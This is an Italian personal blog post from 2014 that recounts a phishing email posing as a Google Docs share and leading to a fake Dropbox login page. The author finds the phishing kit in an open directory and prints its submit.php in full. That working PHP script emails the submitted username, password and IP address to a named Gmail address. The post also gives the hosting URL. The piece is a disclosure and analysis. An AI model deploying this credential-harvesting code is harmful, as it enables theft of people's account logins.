domenica 7 dicembre 2014

Nuove frontiere del Phishing : GDOCS

Oggi mi e' arrivata una mail da una persona che non conosco di persona e che mi aveva condiviso un file su GDocs


da una breve ricerca ho visto che questa persona e' collegata ad un gruppo sui Genesis su Facebook a cui sono iscritto e quindi ho cliccato sul link
Mi si e' aperta questa finestra

Dropbox ??? Che storia e' mai questa ??? Non era GDocs??
E poi guardo la Url ?? non corrisponde a server di Dropbox ma ad un servizio spagnolo (non capisco bene lo spagnolo ma non e' un servizio cloud di file sharing
Provo allora ad andare indietro di una directory su http://surynorte.cl/lee/ ed ecco la gradita sorpresa

Una directory di cui si puo' fare il listing con un file drop.zip troppo invitante per non cliccarci sopra. Lo scarico in locale e questa e' la struttura


il tempo si aprire il file submit.php ed ecco il contenuto
-----------------------------------
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("m-d-Y g:i:a");
$msg = "---------------------------------------------------------------------------\n";
$msg .= "Dropbox Login Info by Abbeymilli\n";
$msg .= "---------------------------------------------------------------------------\n";
$msg .= "Email : ".$_POST['username']."\n";
$msg .= "Password : ".$_POST['password']."\n";
$msg .= "---------------------------------------------------------------------------\n";
$msg .= "Sent from $ip on $time\n";
$msg .= "---------------------------------------------------------------------------\n";
$to = "kelvinpeter270@gmail.com,kelvinpeter270@gmail.com";
$subject = "Chi Lee Update $ip";
$from = "From: Dropbox<newsupdate@servisdropbox.com>";
mail($to,$subject,$msg,$from);
header("Location: http://www.dropbox.com");
?>
-----------------------------------

in pratica lo script invia le credenziali richieste (username e password) ad una mail. Un vero e proprio phishing (seppure un po' dilettantesco)

A chi lo segnalo questo abuso adesso?????

a proposito: chiunque tu sia signor kelvinpeter270@gmail.com, a questo giro non mi hai preso ;>